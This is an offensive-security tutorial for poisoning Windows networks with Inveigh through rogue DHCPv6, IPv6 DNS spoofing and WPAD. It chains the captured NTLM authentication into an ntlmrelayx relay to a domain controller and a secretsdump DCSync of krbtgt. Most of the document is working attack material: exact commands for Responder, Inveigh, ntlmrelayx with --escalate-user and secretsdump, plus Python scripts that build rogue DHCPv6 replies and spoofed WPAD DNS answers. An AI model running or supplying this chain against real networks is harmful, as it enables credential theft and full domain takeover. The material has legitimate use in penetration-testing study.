Using Inveigh with IPv6 DNS spoofing and NTLM Relay
Inveigh is used to poison the internal network: it acts as a rogue DHCPv6 server so that the target's IPv6 DNS server points at the attacker, spoofs the target's WPAD lookup, and the captured NTLM authentication is then fed into an NTLM relay attack chain.
Features
The tool implements attacks over the following protocols:
  - LLMNR [packet sniffer | listener]
  - DNS [packet sniffer | listener]
  - mDNS [packet sniffer | listener]
  - NBNS [packet sniffer | listener]
  - DHCPv6 [packet sniffer | listener]
  - ICMPv6 [privileged raw socket]
  - HTTP [listener]
  - HTTPS [listener]
  - SMB [packet sniffer | listener]
  - LDAP [listener]
  - WebDAV [listener]
  - Proxy Auth [listener]
Parameters
Inveigh.exe -?

Control:
  -Inspect        Default=Disabled: (Y/N) inspect traffic only.
  -IPv4           Default=Enabled: (Y/N) IPv4 spoofing/capture.
  -IPv6           Default=Enabled: (Y/N) IPv6 spoofing/capture.
  -RunCount       Default=Unlimited: Number of NetNTLM captures to perform before auto-exiting.
  -RunTime        Default=Unlimited: Run time duration in minutes.

Output:
  -Console        Default=3: Set the level for console output. (0=none, 1=only captures/spoofs, 2=no informational, 3=all)
  -ConsoleLimit   Default=Unlimited: Limit to queued console entries.
  -ConsoleStatus  Default=Disabled: Interval in minutes for auto-displaying capture details.
  -ConsoleUnique  Default=Enabled: (Y/N) displaying only unique (user and system combination) hashes at time of capture.
  -FileDirectory  Default=Working Directory: Valid path to an output directory for enabled file output.
  -FileOutput     Default=Disabled: (Y/N) real time file output.
  -FilePrefix     Default=Inveigh: Prefix for all output files.
  -FileUnique     Default=Enabled: (Y/N) outputting only unique (user and system combination) hashes.
  -LogOutput      Default=Disabled: (Y/N) outputting log entries.

Spoofers:
  -DHCPv6         Default=Disabled: (Y/N) DHCPv6 spoofing.
  -DHCPv6TTL      Default=300: Lease lifetime in seconds.
  -DNS            Default=Enabled: (Y/N) DNS spoofing.
  -DNSHost        Fully qualified hostname to use in SOA/SRV responses.
  -DNSSRV         Default=LDAP: Comma separated list of SRV request services to answer.
  -DNSSuffix      DNS search suffix to include in DHCPv6/ICMPv6 responses.
  -DNSTTL         Default=30: DNS TTL in seconds.
  -DNSTypes       Default=A: (A, SOA, SRV) Comma separated list of DNS types to spoof.
  -ICMPv6         Default=Enabled: (Y/N) sending ICMPv6 router advertisements.
  -ICMPv6Interval Default=200: ICMPv6 RA interval in seconds.
  -IgnoreDomains  Default=None: Comma separated list of domains to ignore when spoofing.
  -IgnoreHosts    Default=None: Comma separated list of hostnames to ignore when spoofing.
  -IgnoreIPs      Default=Local: Comma separated list of source IP addresses to ignore when spoofing.
  -IgnoreMACs     Default=Local: Comma separated list of MAC addresses to ignore when DHCPv6 spoofing.
  -Local          Default=Disabled: (Y/N) performing spoofing attacks against the host system.
  -LLMNR          Default=Enabled: (Y/N) LLMNR spoofing.
  -LLMNRTTL       Default=30: LLMNR TTL in seconds.
  -MAC            Local MAC address for DHCPv6.
  -MDNS           Default=Enabled: (Y/N) mDNS spoofing.
  -MDNSQuestions  Default=QU,QM: Comma separated list of question types to spoof. (QU,QM)
  -MDNSTTL        Default=120: mDNS TTL in seconds.
  -MDNSTypes      Default=A: Comma separated list of mDNS record types to spoof. (A,AAAA,ANY)
  -MDNSUnicast    Default=Enabled: (Y/N) sending a unicast only response to a QM request.
  -NBNS           Default=Disabled: (Y/N) NBNS spoofing.
  -NBNSTTL        Default=165: NBNS TTL in seconds.
  -NBNSTypes      Default=00,20: Comma separated list of NBNS types to spoof. (00,03,20,1B)
  -ReplyToDomains Default=All: Comma separated list of domains to respond to when spoofing.
  -ReplyToHosts   Default=All: Comma separated list of hostnames to respond to when spoofing.
  -ReplyToIPs     Default=All: Comma separated list of source IP addresses to respond to when spoofing.
  -ReplyToMACs    Default=All: Comma separated list of MAC addresses to respond to when DHCPv6 spoofing.
  -SpooferIP      Default=Autoassign: IP address included in spoofing responses.
  -SpooferIPv6    Default=Autoassign: IPv6 address included in spoofing responses.
  -Repeat         Default=Enabled: (Y/N) repeated spoofing attacks against a system after NetNTLM capture.

Capture:
  -Cert           Base64 certificate for TLS.
  -CertPassword   Base64 certificate password for TLS.
  -Challenge      Default=Random per request: 16 character hex NetNTLM challenge for use with the TCP listeners.
  -HTTP           Default=Enabled: (Y/N) HTTP listener.
  -HTTPAuth       Default=NTLM: (Anonymous/Basic/NTLM) HTTP/HTTPS listener authentication.
  -HTTPPorts      Default=80: Comma separated list of TCP ports for the HTTP listener.
  -HTTPRealm      Default=ADFS: Basic authentication realm.
  -HTTPResponse   Content to serve as the default HTTP/HTTPS/Proxy response.
  -HTTPS          Default=Enabled: (Y/N) HTTPS listener.
  -HTTPSPorts     Default=443: Comma separated list of TCP ports for the HTTPS listener.
  -IgnoreAgents   Default=Firefox: Comma separated list of HTTP user agents to ignore with WPAD and proxy auth.
  -LDAP           Default=Enabled: (Y/N) LDAP listener.
  -LDAPPorts      Default=389: Comma separated list of TCP ports for the LDAP listener.
  -ListenerIP     Default=Any: IP address for all listeners.
  -ListenerIPv6   Default=Any: IPv6 address for all listeners.
  -Machines       Default=Disabled: (Y/N) machine account NetNTLM captures.
  -Proxy          Default=Disabled: (Y/N) proxy listener authentication captures.
  -ProxyAuth      Default=NTLM: (Basic/NTLM) Proxy authentication.
  -ProxyPort      Default=8492: Port for the proxy listener.
  -SMB            Default=Enabled: (Y/N) SMB sniffer/listener.
  -SMBPorts       Default=445: Port for the SMB listener.
  -SnifferIP      Default=Autoassign: IP address included in spoofing responses.
  -SnifferIPv6    Default=Autoassign: IPv6 address included in spoofing responses.
  -WebDAV         Default=Enabled: (Y/N) serving WebDAV over HTTP/HTTPS listener.
  -WebDAVAuth     Default=NTLM: (Anonymous/Basic/NTLM) WebDAV authentication.
  -WPADAuth       Default=NTLM: (Anonymous/Basic/NTLM) authentication type for wpad.dat requests.
  -WPADResponse   Default=Autogenerated: Contents of wpad.dat responses.
Usage
Listen on the public (internet-facing) host. -w starts the rogue WPAD proxy, -r answers NetBIOS wredir suffix queries, -f fingerprints hosts, -v is verbose, and -P forces authentication for proxy requests so that the wpad.dat fetch yields a hash:
responder -I eth0 -wrfvP
Use Inveigh.exe to poison the internal network, passing the public IP address xx.xx.xx.xx as the address to hand out in spoofed DNS responses:
Inveigh.exe -DHCPv6 Y -SpooferIP xx.xx.xx.xx
When the target reboots or reconfigures its network (for example, the cable is unplugged and plugged back in), it sends a DHCPv6 Solicit to obtain an IPv6 configuration. The poisoning host answers it, and the target's IPv6 DNS server is set to the poisoning host's IPv6 address. Windows prefers the IPv6 DNS server over the IPv4 one, so name lookups now go to the attacker even though the IPv4 configuration is untouched.
When the target opens a browser, it tries to resolve WPAD (with the DNS search suffix appended) to auto-detect proxy settings; the poisoning host resolves that name to the public IP.
The browser then fetches wpad.dat from that IP, Responder demands NTLM authentication for it (-w with -P), and the public host receives the target's Net-NTLM hash. A captured Net-NTLMv2 hash cannot be used for pass-the-hash; it can only be cracked offline or relayed while the connection is live, which is what the next section does.
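The DHCPv6 step of the chain above, as an added example that is not part of the original article and not Inveigh's own code: it builds the Advertise/Reply a rogue server sends in answer to a client's Solicit, carrying option 23 (DNS servers) pointed at the attacker's IPv6 address and option 24 (search list) so that a bare "wpad" lookup becomes "wpad.<suffix>", and it parses such a message back so a defender can recognise one. The DUIDs, addresses and the suffix corp.example are constructed sample values, and the link-local heuristic in looks_like_rogue is an assumption about typical spoofer deployments, not something the article states.

```python
# Added example (not from the original article or from Inveigh): DHCPv6 messages
# that a rogue server uses to install a DNS server on the victim (RFC 8415 formats).
import ipaddress
import struct

# DHCPv6 message types and option codes (RFC 8415 sections 7.3 and 21)
MSG_SOLICIT, MSG_ADVERTISE, MSG_REQUEST, MSG_REPLY = 1, 2, 3, 7
OPT_CLIENTID, OPT_SERVERID, OPT_IA_NA, OPT_IAADDR = 1, 2, 3, 5
OPT_DNS_SERVERS, OPT_DOMAIN_LIST = 23, 24


def encode_option(code, payload):
    """option-code (2) | option-len (2) | option-data."""
    return struct.pack("!HH", code, len(payload)) + payload


def encode_domain_list(suffixes):
    """RFC 1035 wire format: length-prefixed labels, each name ending in a zero byte."""
    out = b""
    for name in suffixes:
        for label in name.strip(".").split("."):
            out += bytes([len(label)]) + label.encode("ascii")
        out += b"\x00"
    return out


def parse_options(data):
    """Return {code: [payload, ...]} for a flat DHCPv6 option block."""
    opts = {}
    pos = 0
    while pos + 4 <= len(data):
        code, length = struct.unpack("!HH", data[pos:pos + 4])
        opts.setdefault(code, []).append(data[pos + 4:pos + 4 + length])
        pos += 4 + length
    return opts


def build_advertise(solicit, server_duid, leased_addr, dns_server,
                    dns_suffix, lifetime=300, msg_type=MSG_ADVERTISE):
    """Answer a Solicit (or Request, with msg_type=MSG_REPLY) with a message that
    echoes the client's DUID and IAID so the client accepts it, leases an address
    with the given lifetime (Inveigh's -DHCPv6TTL, default 300 s), and sets the
    DNS server (option 23) and search suffix (option 24, Inveigh's -DNSSuffix)."""
    xid = solicit[1:4]                       # transaction-id copied from the Solicit
    opts = parse_options(solicit[4:])
    client_duid = opts[OPT_CLIENTID][0]
    iaid = opts[OPT_IA_NA][0][:4]
    iaaddr = encode_option(OPT_IAADDR, ipaddress.IPv6Address(leased_addr).packed
                           + struct.pack("!II", lifetime, lifetime))  # preferred, valid
    ia_na = encode_option(OPT_IA_NA, iaid + struct.pack("!II", lifetime // 2,
                                                        lifetime * 4 // 5) + iaaddr)
    body = (encode_option(OPT_CLIENTID, client_duid)
            + encode_option(OPT_SERVERID, server_duid)
            + ia_na
            + encode_option(OPT_DNS_SERVERS, ipaddress.IPv6Address(dns_server).packed)
            + encode_option(OPT_DOMAIN_LIST, encode_domain_list([dns_suffix])))
    return bytes([msg_type]) + xid + body


def dns_servers_in(message):
    """The DNS servers an Advertise/Reply would install on the client."""
    payload = parse_options(message[4:]).get(OPT_DNS_SERVERS, [b""])[0]
    return [str(ipaddress.IPv6Address(payload[i:i + 16]))
            for i in range(0, len(payload), 16)]


def looks_like_rogue(message):
    """Defender heuristic (assumption): spoofers such as Inveigh usually have only a
    link-local address, so an Advertise whose DNS server is in fe80::/10 on a network
    that runs no DHCPv6 at all deserves an alert."""
    return any(ipaddress.IPv6Address(a).is_link_local for a in dns_servers_in(message))


# Constructed sample Solicit: DUID-LL client identifier and an IA_NA with IAID 0e001122.
SAMPLE_SOLICIT = (bytes([MSG_SOLICIT]) + b"\x12\x34\x56"
                  + encode_option(OPT_CLIENTID, b"\x00\x03\x00\x01" + bytes.fromhex("001122334455"))
                  + encode_option(OPT_IA_NA, b"\x0e\x00\x11\x22" + b"\x00" * 8))

if __name__ == "__main__":
    adv = build_advertise(SAMPLE_SOLICIT, b"\x00\x03\x00\x01" + bytes.fromhex("aabbccddeeff"),
                          "fd00::1234", "fe80::1", "corp.example")
    print(adv.hex())
    print("DNS servers pushed:", dns_servers_in(adv), "rogue?", looks_like_rogue(adv))
```

The same builder produces the Reply to the client's follow-up Request by passing msg_type=MSG_REPLY; a real spoofer must answer both, since the client only applies the configuration after the Reply.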
Combined with ntlmrelayx
On the public host, run the following to listen. proxychains is used because the relay target 10.211.55.4 (the internal domain controller) is reached through a SOCKS pivot back into the internal network. --escalate-user grants the account hack replication (DCSync) rights over LDAP, which only succeeds if the relayed user already has rights such as Domain Admin, and only if the DC does not require LDAP signing. --remove-mic (CVE-2019-1040) is needed only when the relayed authentication originates from SMB and the DC is unpatched; for HTTP-originated WPAD authentication it is not required, but it does no harm.
proxychains -q python3 ntlmrelayx.py --remove-mic --escalate-user hack -t ldap://10.211.55.4 -smb2support --no-dump
Use Inveigh.exe to poison the internal network exactly as before, with the public IP address as the spoofed answer:
Inveigh.exe -DHCPv6 Y -SpooferIP xx.xx.xx.xx
The trigger is the same: after a reboot or network reconfiguration the target takes the poisoning host as its IPv6 DNS server, its browser's WPAD lookup resolves to the public host, and the NTLM authentication for wpad.dat arrives at ntlmrelayx. Instead of merely capturing the Net-NTLM hash, ntlmrelayx relays it to the internal domain controller and performs the privileged operation (here, granting hack DCSync rights).
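The DNS half of the chain, used by both the capture-only flow and the relay flow above, as an added example that is not part of the original article and not Inveigh's own code: once the target treats the attacker as its IPv6 DNS server, it sends ordinary DNS queries there, and the spoofer answers only the queries it wants (a "wpad" name, type A) with an IPv4 A record for the listener, mirroring Inveigh's -SpooferIP, -DNSTTL, -DNSTypes, -ReplyToHosts and -IgnoreHosts, while staying silent on everything else so normal traffic is not broken. The listener address 203.0.113.10 and the suffix corp.example are constructed sample values.

```python
# Added example (not from the original article or from Inveigh): policy-driven DNS
# spoofing of the WPAD lookup, with raw packet building/parsing so it runs offline.
import ipaddress
import struct

QTYPE_A, QTYPE_AAAA = 1, 28


def encode_name(name):
    out = b""
    for label in name.strip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(packet, pos):
    """Decode a (possibly compressed) name at pos; return (name, position after it)."""
    labels, jumped, end = [], False, None
    while True:
        length = packet[pos]
        if length & 0xC0 == 0xC0:                       # compression pointer
            pointer = struct.unpack("!H", packet[pos:pos + 2])[0] & 0x3FFF
            if not jumped:
                end = pos + 2
            pos, jumped = pointer, True
            continue
        pos += 1
        if length == 0:
            break
        labels.append(packet[pos:pos + length].decode("ascii"))
        pos += length
    return ".".join(labels), (end if jumped else pos)


def build_query(name, qtype, txid=0x1234):
    """A client query as the victim's resolver would send it (RD set, one question)."""
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", qtype, 1)


class WpadSpoofer:
    def __init__(self, spoofer_ip, ttl=30, types=(QTYPE_A,),
                 reply_to_hosts=("wpad",), ignore_hosts=()):
        self.spoofer_ip = ipaddress.IPv4Address(spoofer_ip).packed   # -SpooferIP
        self.ttl = ttl                                               # -DNSTTL
        self.types = set(types)                                      # -DNSTypes
        # -ReplyToHosts (None means all, like Inveigh's default) and -IgnoreHosts
        self.reply_to = None if reply_to_hosts is None else {h.lower() for h in reply_to_hosts}
        self.ignore = {h.lower() for h in ignore_hosts}

    def answer(self, query):
        """Return a spoofed response, or None when the policy says stay silent."""
        txid, flags, qdcount = struct.unpack("!HHH", query[:6])
        if flags & 0x8000 or qdcount != 1:       # responses and multi-question queries
            return None
        name, pos = decode_name(query, 12)
        qtype, qclass = struct.unpack("!HH", query[pos:pos + 4])
        host = name.split(".")[0].lower()        # 'wpad.corp.example' -> 'wpad'
        if qclass != 1 or qtype not in self.types or host in self.ignore:
            return None
        if self.reply_to is not None and host not in self.reply_to:
            return None
        header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR, RD, RA, 1 answer
        question = query[12:pos + 4]
        answer = (b"\xc0\x0c"                     # pointer back to the question name
                  + struct.pack("!HHIH", QTYPE_A, 1, self.ttl, 4) + self.spoofer_ip)
        return header + question + answer


def spoofed_address(response):
    """(address, ttl) from the single A record in a WpadSpoofer response."""
    _, pos = decode_name(response, 12)
    _, pos = decode_name(response, pos + 4)
    _, _, ttl, rdlen = struct.unpack("!HHIH", response[pos:pos + 10])
    return str(ipaddress.IPv4Address(response[pos + 10:pos + 10 + rdlen])), ttl


if __name__ == "__main__":
    spoofer = WpadSpoofer("203.0.113.10")
    for qname, qtype in (("wpad.corp.example", QTYPE_A), ("fileserver.corp.example", QTYPE_A)):
        resp = spoofer.answer(build_query(qname, qtype))
        print(qname, "->", spoofed_address(resp) if resp else "not answered")
```

Answering only the WPAD name is what keeps the rest of the victim's resolution working: with the default Inveigh policy (-ReplyToHosts All) every A query would be answered with the spoofer address, which is far noisier and breaks the host's normal traffic.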
With hack now holding replication rights, DCSync the krbtgt account through the same pivot (domain xie, attacker-controlled account hack):
proxychains -q python3 secretsdump.py xie/hack:P@ss1234@10.211.55.4 -just-dc-user krbtgt